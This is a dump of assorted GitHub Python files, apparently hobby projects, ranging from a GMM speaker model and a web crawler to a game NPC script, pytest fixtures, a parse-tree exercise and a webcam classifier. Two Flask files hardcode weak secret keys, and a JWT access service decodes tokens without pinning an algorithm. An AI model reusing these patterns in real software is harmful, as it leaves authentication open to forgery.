Skip this component\")\n wL_.append(wi)\n continue\n\n eL[i] = 1 / nL[i] * np.sum([pD[i][t] * data[t] for t in range(T)], axis=0)\n e2L[i] = (1 / nL[i] * np.sum([pD[i][t] * self.square(data[t]) for t in range(T)], axis=0))\n\n # Use one adaption cofficient for weight, mean and covariance\n r = 16\n alpha = nL[i] / (nL[i] + r)\n\n wi_ = alpha * nL[i] / T + (1 - alpha) * wi\n\n mui_ = alpha * eL[i] + (1 - alpha) * mui\n\n # Disable covariance adapting since new covariance has negative element in diagonal\n # cov_ = alpha * e2L[i] + (1 - alpha) * (cov + self.square(mui)) - self.square(mui_)\n\n print(\"Old mean\", mui)\n print(\"New mean\", mui_)\n print(\"Old weight\", wi)\n print(\"New weight\", wi_)\n\n self.gmm_model.means_[i] = mui_\n # self.gmm_model.covariances_[i] = np.diag(cov_) # only take diagonal matrix\n\n wL_.append(wi_)\n\n total_w = sum(wL_)\n\n for i in range(M):\n # Normalize weight to ensure total weight sum = 1\n self.gmm_model.weights_[i] = wL_[i] / total_w\n\n def square(self, vector):\n return np.outer(vector, vector)\n\n def log_proba(self, data):\n return self.gmm_model.score(data)\n","repo_name":"linhndt/spoken_language_classification","sub_path":"speaker_model/gmm_model.py","file_name":"gmm_model.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"9593872501","text":"import win32file\nimport win32api\nimport subprocess\nimport sys\nfrom time import sleep\nfrom .utils import get_repo_bin_path\nfrom .common import hand_bin_name, pipe_name\n\nclass Hand:\n\n def __init__(self) -> None:\n self._start_server()\n sleep(0.1)\n self._connect_to_pipe()\n sleep(0.1)\n\n def __del__(self):\n sleep(0.1)\n self._disconnect_to_pipe()\n self._kill_server()\n\n\n def click(self, duty_ratio: float):\n self._send_message(f'clicking {duty_ratio:.2f}')\n \n def stop(self):\n self._send_message('idle')\n\n def _start_server(self):\n print(str(get_repo_bin_path() / hand_bin_name))\n self.server_process = subprocess.Popen(\n [str(get_repo_bin_path() / hand_bin_name)], \n stdout=sys.stdout\n )\n\n def _kill_server(self):\n self.server_process.kill()\n\n def _connect_to_pipe(self):\n self.pipe_handle = win32file.CreateFile(\n pipe_name,\n win32file.GENERIC_WRITE,\n win32file.FILE_SHARE_READ,\n None,\n win32file.OPEN_EXISTING,\n win32file.FILE_ATTRIBUTE_NORMAL,\n None\n )\n\n if self.pipe_handle is None:\n raise RuntimeError('Failed to connect to pipe, please check whether pipe is created.')\n\n def _disconnect_to_pipe(self):\n win32api.CloseHandle(self.pipe_handle)\n\n def _send_message(self, message: str) -> bool:\n error_code, num_bytes_written = win32file.WriteFile(self.pipe_handle, message.encode())\n if error_code != 0 or num_bytes_written == 0:\n return False\n else:\n return True","repo_name":"Lixian-Zhang/StardrewAutoFishing","sub_path":"src/autofishing/Hand.py","file_name":"Hand.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28225304858","text":"import urllib.parse\nfrom Crawler import Crawler\nfrom RealEstate import RealEstate\n\n\nclass AruodasCrawler(Crawler):\n def set_data_containers(self):\n self.containers = self.page_soup.findAll(\"tr\", {\"class\": \"list-row\"})\n\n def crawl_data(self):\n real_estates = []\n for container in self.containers:\n if not container.img:\n continue\n\n title = container.img[\"alt\"]\n image_url = container.img[\"src\"]\n 
address_container = container.find(\"td\", {\"class\": \"list-adress\"})\n link = address_container.a[\"href\"]\n\n area = container.find(\"td\", {\"class\": \"list-AreaOverall\"}).text.strip()\n building_status = None\n building_status_value_container = container.find(\"td\", {\"class\": \"list-HouseStates\"});\n if building_status_value_container:\n building_status = building_status_value_container.text.strip()\n\n price_container = address_container.find(\"div\", {\"class\": \"price\"})\n price = price_container.find(\"span\", {\"class\": \"list-item-price\"}).text.strip()\n crawler_id = self.options[\"id\"]\n\n real_estates.append(\n RealEstate(title, link, price, area, building_status, image_url, crawler_id).to_json())\n\n return real_estates\n\n def create_url(self):\n options = self.options\n real_estate_type = options[\"realEstateType\"]\n price_min = options[\"priceMin\"]\n price_max = options[\"priceMax\"]\n area_min = options[\"areaMin\"]\n area_max = options[\"areaMax\"]\n rooms_min = options[\"roomsMin\"]\n rooms_max = options[\"roomsMax\"]\n\n params = {\n \"FOrder\": \"AddDate\",\n \"FRegionArea\": 462,\n }\n if price_min:\n params[\"FPriceMin\"] = price_min\n\n if price_max:\n params[\"FPriceMax\"] = price_max\n\n if area_min:\n params[\"FAreaOverAllMin\"] = area_min\n\n if area_max:\n params[\"FAreaOverAllMax\"] = area_max\n\n if rooms_min:\n params[\"FRoomNumMin\"] = rooms_min\n\n if rooms_max:\n params[\"FRoomNumMax\"] = rooms_max\n\n if real_estate_type == \"house\":\n url = 'https://www.aruodas.lt/namai/vilniuje/?'\n else:\n url = 'https://www.aruodas.lt/butai/vilniuje/?'\n\n print(url + urllib.parse.urlencode(params))\n return url + urllib.parse.urlencode(params)\n","repo_name":"mindaugas16/mine-house","sub_path":"crawler/crawlers/AruodasCrawler.py","file_name":"AruodasCrawler.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"26758195089","text":"# Configuration settings for the flask application\n# Vyyom Kelkar\n\n# Enable forms and entries\nWTF_CSRF_ENABLED = True\n\nSECRET_KEY = 'youwillneverguess'\n\n# Declare the database for the application, the folder for the migrations and settings for tracking modifications\nSQLALCHEMY_DATABASE_URI = 'sqlite:///db/app.db'\nSQLALCHEMY_MIGRATE_REPO = 'db_repository'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n","repo_name":"Vyyom-Kelkar/Profile-Password-Management-System","sub_path":"app/submitFiles/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8548829196","text":"\"\"\" 11004332: Lanemone \"\"\"\nfrom npc_api import Option, Script\nimport random\n\n\nclass Main(Script):\n def first(self) -> int:\n return random.choice([10, 30])\n\n def select(self) -> int:\n return random.choice([0, 20])\n\n def __0(self, pick: int) -> int:\n # $script:1102172107011635$\n # - Hm...\n return None # TODO\n\n def __20(self, pick: int) -> int:\n # $script:1010140307011563$\n # - Mm?\n return None # TODO\n\n def __10(self, pick: int) -> int:\n # $script:1102172107011636$\n # - I sense something powerful. Something... 
wrong.\n return -1\n\n def __30(self, pick: int) -> int:\n if self.index == 0:\n # $script:1010140307011564$\n # - Hey, you!\n return 30\n elif self.index == 1:\n # $script:1010140307011565$\n # - Long time no see.\n return 30\n elif self.index == 2:\n # $script:1010140307011566$\n # - I wasn't expecting to run into you here.\n if pick == 0:\n # $script:1010140307011567$\n # - What brings you here?\n return 40\n return -1\n return -1\n\n def __40(self, pick: int) -> int:\n if self.index == 0:\n # $script:1010140307011568$\n # - Well, that geezer—erm, Mr. $npcName:11004233[gender:0]$ sent me here.\n return 40\n elif self.index == 1:\n # $script:1010140307011569$\n # - The Frontier Foundation caught wind of something quite unexpected here on this continent that warranted investigation.\n return 40\n elif self.index == 2:\n # $script:1010140307011570$\n # - Traces of lapenta energy!\n return 40\n elif self.index == 3:\n # $script:1010140307011571$\n # - But I suppose you already knew that.\n return 40\n elif self.index == 4:\n # $script:1010140307011572$\n # - You should be careful. There's no telling what kinds of dangers lurk in this land.\n if pick == 0:\n # $script:0111232407012699$\n # - You too. Take care of yourself.\n return 50\n return -1\n return -1\n\n def __50(self, pick: int) -> int:\n # $script:0111232407012700$\n # - Oh, you don't have to worry about me.\n return -1\n\n def button(self) -> Option:\n if (self.state, self.index) == (10, 0):\n return Option.CLOSE\n elif (self.state, self.index) == (30, 0):\n return Option.NEXT\n elif (self.state, self.index) == (30, 1):\n return Option.NEXT\n elif (self.state, self.index) == (30, 2):\n return Option.SELECTABLE_DISTRACTOR\n elif (self.state, self.index) == (40, 0):\n return Option.NEXT\n elif (self.state, self.index) == (40, 1):\n return Option.NEXT\n elif (self.state, self.index) == (40, 2):\n return Option.NEXT\n elif (self.state, self.index) == (40, 3):\n return Option.NEXT\n elif (self.state, self.index) == (40, 4):\n return Option.SELECTABLE_DISTRACTOR\n elif (self.state, self.index) == (50, 0):\n return Option.CLOSE\n return Option.NONE\n","repo_name":"kOchirasu/Maple2-GeneratedScripts","sub_path":"Npc/11004332.py","file_name":"11004332.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16945739519","text":"import os\nfrom typing import Dict\n\nimport pytest\nimport tenacity\nfrom pytest import CollectReport, StashKey\n\n# https://docs.pytest.org/en/latest/example/simple.html#making-test-result-information-available-in-fixtures\nphase_report_key = StashKey[Dict[str, CollectReport]]()\n\n\n@pytest.hookimpl(tryfirst=True, hookwrapper=True)\ndef pytest_runtest_makereport(item, call):\n # execute all other hooks to obtain the report object\n outcome = yield\n rep = outcome.get_result()\n\n # store test results for each phase of a call, which can\n # be \"setup\", \"call\", \"teardown\"\n item.stash.setdefault(phase_report_key, {})[rep.when] = rep\n\n\n@pytest.fixture\ndef provider(request):\n if os.environ.get(\"OS_CLOUD\") is not None:\n provider = \"openstack\"\n else:\n provider = \"vagrant\"\n # raise RuntimeError(\"Openstack EnvVar cannot be found\")\n return request.getfixturevalue(provider)\n\n\n@tenacity.retry(reraise=True, stop=tenacity.stop_after_attempt(2))\ndef cluster_spawn(provider, keep_servers):\n provider.init()\n if not keep_servers:\n provider.destroy()\n provider.apply()\n\n\n@pytest.fixture\ndef 
cluster(request, provider, operating_system):\n keep_servers = request.config.getoption(\"keep_servers\")\n keep_after_fail = request.config.getoption(\"keep_servers_after_fail\")\n try:\n cluster_spawn(provider, keep_servers)\n yield provider.cluster()\n report = request.node.stash[phase_report_key]\n if \"call\" in report and report[\"call\"].failed:\n if not keep_after_fail:\n provider.destroy()\n elif not keep_servers:\n provider.destroy()\n except Exception:\n if not keep_after_fail:\n provider.destroy()\n","repo_name":"enix/ansible-kubeadm","sub_path":"tests/helpers/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"30159549443","text":"\"\"\"Configuration file for the Sphinx documentation builder.\"\"\"\n# pylint: disable=invalid-name\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = \"GRSS\"\nproject_copyright = \"2023, Rahil Makadia\"\nauthor = \"Rahil Makadia\"\n# get release and version from version.txt\nwith open(\"../../grss/version.txt\", \"r\", encoding=\"utf-8\") as f:\n release = version = f.read().strip()\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n \"sphinx_copybutton\", # for adding copy button to code blocks\n \"sphinx.ext.autosummary\", # for generating documentation from docstrings\n \"sphinx.ext.duration\", # for printing duration when building docs\n \"sphinx.ext.napoleon\", # for parsing numpy style docstrings\n \"nbsphinx\", # for parsing jupyter notebooks\n \"sphinx_favicon\", # for adding full favicon support\n \"sphinx_gallery.load_style\", # for displaying jupyter notebook thumbnails\n]\nautosummary_generate = True\n\ntemplates_path = [\"_templates\"]\nexclude_patterns = []\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = \"sphinx_book_theme\"\nhtml_context = {\n \"default_mode\": \"light\",\n}\nhtml_theme_options = {\n \"repository_url\": \"https://github.com/rahil-makadia/grss\",\n \"repository_branch\": \"main\",\n \"path_to_docs\": \"docs\",\n \"use_download_button\": True,\n \"use_edit_page_button\": False,\n \"use_fullscreen_button\": True,\n \"use_issues_button\": True,\n \"use_repository_button\": True,\n \"use_source_button\": False,\n \"use_sidenotes\": False,\n \"home_page_in_toc\": False,\n \"show_navbar_depth\": 1,\n \"show_toc_level\": 1,\n \"logo\": {\n # Because the logo is also a homepage link,\n # including \"home\" in the alt text is good practice\n \"alt_text\": \"GRSS - Home\",\n \"text\": f\"{project} v{version} documentation\",\n },\n # \"icon_links\": [\n # {\n # \"name\": \"GitHub\",\n # \"url\": \"https://github.com/rahil-makadia/grss\",\n # \"icon\": \"fa-brands fa-github\",\n # },\n # {\n # \"name\": \"PyPI Downloads\",\n # \"url\": \"https://pypi.org/project/grss/\",\n # \"icon\": \"https://img.shields.io/pypi/dw/grss\",\n # \"type\": \"url\",\n # },\n # {\n # \"name\": \"PyPI\",\n # \"url\": \"https://pypi.org/project/grss/\",\n # \"icon\": 
\"fa-brands fa-python\",\n # },\n # ],\n \"extra_footer\": (\"Created using \"\n \"<a href=https://sphinx-book-theme.readthedocs.io/>\"\n \"The Sphinx Book Theme</a>.\"),\n}\nhtml_last_updated_fmt = \"%b %d, %Y\"\nhtml_logo = \"_static/grss-cropped.svg\"\nhtml_static_path = [\"_static\"]\nfavicons = [\n # generic icons compatible with most browsers\n \"favicon.ico\",\n \"favicon-32x32.png\",\n \"favicon-16x16.png\",\n {\"rel\": \"shortcut icon\", \"sizes\": \"any\", \"href\": \"favicon.ico\"},\n # chrome specific\n \"android-chrome-192x192.png\",\n # apple icons\n {\"rel\": \"mask-icon\", \"color\": \"#67b934\", \"href\": \"safari-pinned-tab.svg\"},\n {\"rel\": \"apple-touch-icon\", \"href\": \"apple-touch-icon.png\"},\n # msapplications\n {\"name\": \"msapplication-TileColor\", \"content\": \"#da532c\"},\n {\"name\": \"theme-color\", \"content\": \"#ffffff\"},\n {\"name\": \"msapplication-TileImage\", \"content\": \"mstile-310x310.png\"},\n]\nexclude_patterns = [\"**.ipynb_checkpoints\"]\n","repo_name":"rahil-makadia/grss","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70688246214","text":"#!/usr/bin/env python3\n\"\"\"\nTo run tests:\n python3 -m unittest trees_nodes_refs.py\n\n\"\"\"\nimport unittest\nimport operator\n\n\nclass BinaryTree:\n\n def __init__(self, value=None):\n self.value = value\n self.left = None\n self.right = None\n\n def insert_left(self, value):\n if not self.left:\n self.left = BinaryTree(value)\n else:\n # push existing node down one level\n tree = BinaryTree(value)\n tree.left = self.left\n self.left = tree\n\n def insert_right(self, value):\n if not self.right:\n self.right = BinaryTree(value)\n else:\n # push existing node down one level\n tree = BinaryTree(value)\n tree.right = self.right\n self.right = tree\n\n\ndef create_parse_tree(expression):\n\n # stack acts as a cursor in the construction of the tree\n stack = list()\n stack.append(BinaryTree())\n\n for token in expression:\n if token == ' ':\n pass\n elif token == '(':\n current = stack.pop()\n current.left = BinaryTree()\n stack.append(current) # return to stack\n stack.append(current.left) # make new current\n elif token == ')':\n if len(stack) == 1:\n # preserve at least one\n pass\n else:\n # goto parent\n stack.pop()\n elif token in '+-*/':\n current = stack.pop()\n current.value = token\n current.right = BinaryTree()\n stack.append(current)\n stack.append(current.right)\n elif token.isdigit():\n current = stack.pop()\n current.value = int(token)\n # stack is now at parent\n else:\n assert False, 'Unrecoginsed token'\n\n root = stack.pop()\n assert not stack, 'cursor should be @ root of tree'\n\n return root\n\n\ndef evaluate(tree):\n\n operations = {\n '+': operator.add,\n '-': operator.sub,\n '*': operator.mul,\n '/': operator.truediv,\n }\n\n if tree.left and tree.right:\n op = operations[tree.value]\n result = op(\n evaluate(tree.left),\n evaluate(tree.right)\n )\n return result\n else:\n return tree.value\n\n\nclass TestBinaryTree(unittest.TestCase):\n\n def test_can_create(self):\n\n tree = BinaryTree(0)\n\n assert tree.value == 0\n\n def test_insert_left(self):\n\n tree = BinaryTree(0)\n\n tree.insert_left(1)\n tree.left.insert_left(2)\n tree.left.left.insert_left(3)\n\n assert tree.left.value == 1\n assert tree.left.left.value == 2\n assert tree.left.left.left.value == 3\n\n def test_insert_left_pushes_down_values(self):\n\n tree = 
BinaryTree(0)\n\n tree.insert_left(1)\n tree.insert_left(2)\n tree.insert_left(3)\n\n assert tree.left.value == 3\n assert tree.left.left.value == 2\n assert tree.left.left.left.value == 1\n\n def test_insert_right(self):\n\n tree = BinaryTree(0)\n\n tree.insert_right(1)\n tree.right.insert_right(2)\n tree.right.right.insert_right(3)\n\n assert tree.right.value == 1\n assert tree.right.right.value == 2\n assert tree.right.right.right.value == 3\n\n def test_insert_right_pushes_down_values(self):\n\n tree = BinaryTree(0)\n\n tree.insert_right(1)\n tree.insert_right(2)\n tree.insert_right(3)\n\n assert tree.right.value == 3\n assert tree.right.right.value == 2\n assert tree.right.right.right.value == 1\n\n def test_full_binary_tree(self):\n\n # represent the following binary tree\n\n # a\n # / \\\n # b c\n # \\ | \\\n # d e f\n\n tree = BinaryTree('a')\n\n tree.insert_left('b')\n tree.left.insert_right('d')\n tree.insert_right('f')\n tree.insert_right('c') # push down 'f'\n tree.right.insert_left('e')\n\n # assertions in breadth first search order\n assert tree.value == 'a'\n\n assert tree.left.value == 'b'\n assert tree.right.value == 'c'\n\n assert tree.left.right.value == 'd'\n assert tree.right.left.value == 'e'\n assert tree.right.right.value == 'f'\n\n\nclass TestParseTree(unittest.TestCase):\n\n def test_4_plus_3(self):\n expr = \"(4 + 3)\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == 4\n assert tree.right.value == 3\n\n def test_5_plus_9(self):\n\n expr = \"(5 + 9)\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == 5\n assert tree.right.value == 9\n\n def test_nested_parenthesis(self):\n\n expr = \"((5 + 9) + (1 + 3))\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == \"+\"\n assert tree.left.left.value == 5\n assert tree.left.right.value == 9\n assert tree.right.value == \"+\"\n assert tree.right.left.value == 1\n assert tree.right.right.value == 3\n\n def test_nested_parenthesis_unsymetric(self):\n\n expr = \"(5 + (1 + 3))\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == 5\n assert tree.right.value == \"+\"\n assert tree.right.left.value == 1\n assert tree.right.right.value == 3\n\n\nclass TestEvaluateParseTree(unittest.TestCase):\n\n def test_4_plus_3(self):\n\n expr = \"(4 + 3)\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 7\n\n self.assertEqual(got, expected)\n\n def test_5_plus_9(self):\n\n expr = \"(5 + 9)\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 14\n\n self.assertEqual(got, expected)\n\n def test_nested_parenthesis(self):\n\n expr = \"((5 + 9) + (1 + 3))\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 18\n\n self.assertEqual(got, expected)\n\n def test_nested_parenthesis_unsymetric(self):\n\n expr = \"(5 + (1 + 3))\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 9\n\n self.assertEqual(got, expected)\n","repo_name":"arachnegl/algos","sub_path":"trees_nodes_refs.py","file_name":"trees_nodes_refs.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29775562707","text":"\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom logger import root\r\napp = Flask(__name__)\r\n\r\nimport time\r\nimport requests\r\nimport 
jwt\r\njwt_key='bnmit'\r\n\r\n\r\n\r\n@app.route('/fetch_access',methods=['GET'])\r\ndef get_access():\r\n global jwt_key\r\n\r\n url = request.args.get('url')\r\n perms = request.args.get('perms')\r\n user_id = request.args.get('user_id')\r\n user_access = {\r\n \"1\": [\"http://google.com\", \"http://facebook.com\"],\r\n \"2\": [\"http://google.com\"]\r\n }\r\n if url not in user_access[user_id]:\r\n return {\"error\": 'Invalid access'}\r\n\r\n payload={\r\n 'url':url,\r\n 'perms':perms,\r\n 'user_id':user_id\r\n }\r\n token=jwt.encode(payload,jwt_key,algorithm='HS256')\r\n return token\r\n\r\n@app.route('/check_access',methods=['GET'])\r\ndef check_access():\r\n token = request.args.get('access_token')\r\n root.info('started')\r\n payload=jwt.decode(token,jwt_key)\r\n root.info('decoding:status completd')\r\n return payload\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(port='5004',debug=True)\r\n\r\n","repo_name":"Akshay-Anand010/microservices-using-flask","sub_path":"accessprovider.py","file_name":"accessprovider.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42362104988","text":"# For files\nimport os\n\n# Deep-learning framework\nimport sys\n\nimport tensorflow as tf\n\n# Manipulate\nimport numpy as np\n\n# visualization\nimport cv2\n\n# Data directory\nfrom sklearn.preprocessing import minmax_scale\n\nINPUT_ROOT_DIR = './input/task'\nTEST_IMG_DIR = os.path.join(INPUT_ROOT_DIR, 'test')\nOUTPUT_ROOT_DIR = './output/task'\nLOG_DIR = os.path.join(OUTPUT_ROOT_DIR, 'tblogs')\nCHECKPOINT_DIR = os.path.join(OUTPUT_ROOT_DIR, 'train')\nTHRESHOLD = 0.6\n\n# 256x256으로 이미지 다운샘플링\ndef resize_image(img):\n # Read images from disk & resize\n # print('start resizing image')\n # image = cv2.imread(img)\n image = cv2.resize(img, dsize=(227, 227), interpolation=cv2.INTER_AREA)\n # print('end resizing')\n return image\n\n\ndef prediction(x, param):\n # inputs = tf.constant(x, name='inputs')\n inputs = x\n\n # layer 1\n l1_convolve = tf.nn.conv2d(input=inputs, filters=param['w1'], strides=4, padding='VALID', name='l1_convolve')\n l1_bias = tf.reshape(tf.nn.bias_add(l1_convolve, param['b1']), tf.shape(l1_convolve), name='l1_bias')\n l1_relu = tf.nn.relu6(l1_bias, name='l1_relu')\n l1_norm = tf.nn.lrn(input=l1_relu, depth_radius=5, alpha=10e-4, beta=0.75, bias=2.0, name='l1_norm')\n l1_pool = tf.nn.max_pool(input=l1_norm, ksize=3, strides=2, padding='VALID', name='l1_pool')\n\n # layer 2\n l2_convolve = tf.nn.conv2d(input=l1_pool, filters=param['w2'], strides=1, padding='SAME', name='l2_convolve')\n l2_bias = tf.reshape(tf.nn.bias_add(l2_convolve, param['b2']), tf.shape(l2_convolve), name='l2_bias')\n l2_relu = tf.nn.relu6(l2_bias, name='l2_relu')\n l2_norm = tf.nn.lrn(input=l2_relu, depth_radius=5, alpha=10e-4, beta=0.75, bias=2.0, name='l2_norm')\n l2_pool = tf.nn.max_pool(input=l2_norm, ksize=3, strides=2, padding='VALID', name='l2_pool')\n\n # layer 3\n l3_convolve = tf.nn.conv2d(input=l2_pool, filters=param['w3'], strides=1, padding='SAME', name='l3_convolve')\n l3_bias = tf.reshape(tf.nn.bias_add(l3_convolve, param['b3']), tf.shape(l3_convolve), name='l3_bias')\n l3_relu = tf.nn.relu6(l3_bias, name='l3_relu')\n\n # layer 4\n l4_convolve = tf.nn.conv2d(input=l3_relu, filters=param['w4'], strides=1, padding='SAME', name='l4_convolve')\n l4_bias = tf.reshape(tf.nn.bias_add(l4_convolve, param['b4']), tf.shape(l4_convolve), name='l4_bias')\n l4_relu = tf.nn.relu6(l4_bias, 
name='l4_relu')\n\n # layer 5\n l5_convolve = tf.nn.conv2d(input=l4_relu, filters=param['w5'], strides=1, padding='SAME', name='l5_convolve')\n l5_bias = tf.reshape(tf.nn.bias_add(l5_convolve, param['b5']), tf.shape(l5_convolve), name='l5_bias')\n l5_relu = tf.nn.relu6(l5_bias, name='l5_relu')\n l5_pool = tf.nn.max_pool(input=l5_relu, ksize=3, strides=2, padding='VALID', name='l5_pool')\n\n # layer 6\n l6_flattened = tf.reshape(l5_pool, [-1, tf.shape(param['w6'])[0]], name='l6_flattened')\n l6_fc = tf.nn.bias_add(tf.matmul(l6_flattened, param['w6']), param['b6'], name='l6_fc')\n l6_relu = tf.nn.relu6(l6_fc, name='l6_relu')\n\n # layer 7\n l7_fc = tf.nn.bias_add(tf.matmul(l6_relu, param['w7']), param['b7'], name='l7_fc')\n l7_relu = tf.nn.relu6(l7_fc, name='l7_relu')\n\n # layer 8\n logits = tf.nn.bias_add(tf.matmul(l7_relu, param['w8']), param['b8'], name='l8_fc')\n softmax_score = tf.nn.softmax(logits, 1)\n\n return softmax_score\n\n\ndef predict(softmax_scores, threshold=THRESHOLD):\n softmax_score = np.mean(softmax_scores, axis=0)\n\n unknown = True\n for s in softmax_score[0]:\n if s > threshold:\n unknown = False\n\n if unknown:\n return 20000\n\n else:\n predict = tf.argmax(softmax_score, 1).numpy()\n return predict\n\n\ndef load_param(ckpts_path=OUTPUT_ROOT_DIR):\n\n # 클래스명 출력을 위해 디렉토리명 저장\n dirs = list()\n\n for dir in os.walk(TEST_IMG_DIR).__next__()[1]:\n dirs.append(dir)\n\n # 저장된 trained 모델(=trained parameters) 들을 불러온 후, test set 에서 loss 계산\n models = list()\n for item in os.walk(ckpts_path).__next__()[2]:\n if item.endswith('.npz'):\n models.append(item)\n\n loaded_params = list()\n for model in models:\n loaded_param = np.load(os.path.join(ckpts_path, model), allow_pickle=True)\n loaded_param = {key: loaded_param[key].item() for key in loaded_param}\n loaded_params.append(loaded_param)\n\n return dirs, loaded_params\n\n\ndef test(image, loaded_params, dirs):\n img = resize_image(image)\n\n scores = list()\n for param in loaded_params:\n score = prediction(tf.cast(tf.reshape(img, [-1, 227, 227, 3]), dtype=tf.float32), param['arr_0'])\n scores.append(score)\n\n pred = predict(scores)\n\n if pred == 20000:\n return 'unknown'\n else:\n return dirs[pred[0]]\n\ndef minmax(img, min, max):\n # R, G, B 채널을 각각 순회하며 계산된 값을 각 픽셀마다 가감\n scaled_img = np.array(img).copy()\n for idx in range(3):\n scaled_img[..., idx] = minmax_scale(img[..., idx], feature_range=(min, max))\n\n return scaled_img\n\n\nif __name__ == \"__main__\":\n camera = cv2.VideoCapture(0);\n classes, params = load_param()\n # f, img = camera.read();\n # pred = test(image=img, loaded_param=param, dirs=classes)\n # foo = [1,2,3,4,5]\n # pred = 0\n # bar = 0\n count = 0\n\n while cv2.waitKey(1) != ord('q'):\n f, img = camera.read()\n # new = bar\n # if pred != new:\n # cv2.destroyWindow(pred)\n # cv2.destroyWindow('{}'.format(foo[pred]))\n # pred = new\n\n if count % 10 == 0:\n pred = test(minmax(img, -1.0, 1.0), params, classes)\n\n cv2.putText(img, pred, (300, 150), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2, cv2.LINE_AA)\n\n cv2.imshow('Prediction', img);\n # cv2.imshow('{}'.format(foo[pred]), img)\n # bar += 1\n count += 1\n\n camera.release()\n cv2.destroyAllWindows()\n","repo_name":"redJihun/alexNet","sub_path":"realtime_task.py","file_name":"realtime_task.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13383504233","text":"from pyphysx import *\nfrom pyphysx_utils.rate import Rate\nfrom 
pyphysx_render.pyrender import PyPhysxViewer\n\nscene = Scene()\nscene.add_actor(RigidStatic.create_plane(material=Material(static_friction=0.1, dynamic_friction=0.1, restitution=0.5)))\n\nactor = RigidDynamic()\nactor.attach_shape(Shape.create_box([0.2] * 3, Material(restitution=1.)))\nactor.set_global_pose([0.5, 0.5, 1.0])\nactor.set_mass(1.)\nscene.add_actor(actor)\n\nrender = PyPhysxViewer(video_filename='videos/01_free_fall.gif')\nrender.add_physx_scene(scene)\n\nrate = Rate(240)\nwhile render.is_active:\n scene.simulate(rate.period())\n render.update()\n rate.sleep()\n","repo_name":"petrikvladimir/pyphysx","sub_path":"examples/01_free_fall.py","file_name":"01_free_fall.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"44"} +{"seq_id":"18225229860","text":"from django.core.management.base import BaseCommand\nfrom ticketing.models import Ticket\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('top', nargs='?', type=int, default=5)\n\n def handle(self, *args, **options):\n people = {}\n for ticket in Ticket.objects.all():\n if ticket.recipient_id in people:\n people[ticket.recipient_id].append(str(ticket.pk))\n else:\n people[ticket.recipient_id] = [str(ticket.pk)]\n people_sorted = sorted(people.keys(), key=lambda person: len(people[person]), reverse=True)\n\n output_string = \"Recipients by Frequency:\\n\"\n for index, person in enumerate(people_sorted):\n output_string += f\"{person}: {', '.join(people[person])}\\n\"\n if index > options['top']:\n break\n\n histogram = {}\n print(histogram)\n output_string += \"\\nStatistics:\\n\"\n for tickets in people.values():\n num_tickets = len(tickets)\n if num_tickets in histogram:\n histogram[num_tickets] += 1\n else:\n histogram[num_tickets] = 1\n for num_tickets in sorted(histogram):\n output_string += f\"{num_tickets}: {histogram[num_tickets]}\\n\"\n\n self.stdout.write(self.style.SUCCESS(output_string))\n","repo_name":"rw-a/valentines-day","sub_path":"ticketing/management/commands/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"15960335856","text":"import RPi.GPIO as gpio\t\t# Used to connect to Raspberry Pi\nimport time\t\t\t\t\t# Used to sleep main thread for lock\nimport pyrebase\t\t\t\t# Used to connect to Firebase\n\n\ndef init():\n\t'''\n\tSetup Raspberry Pi GPIO pins.\n\n\t'''\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(17, gpio.OUT)\n\tgpio.setup(22, 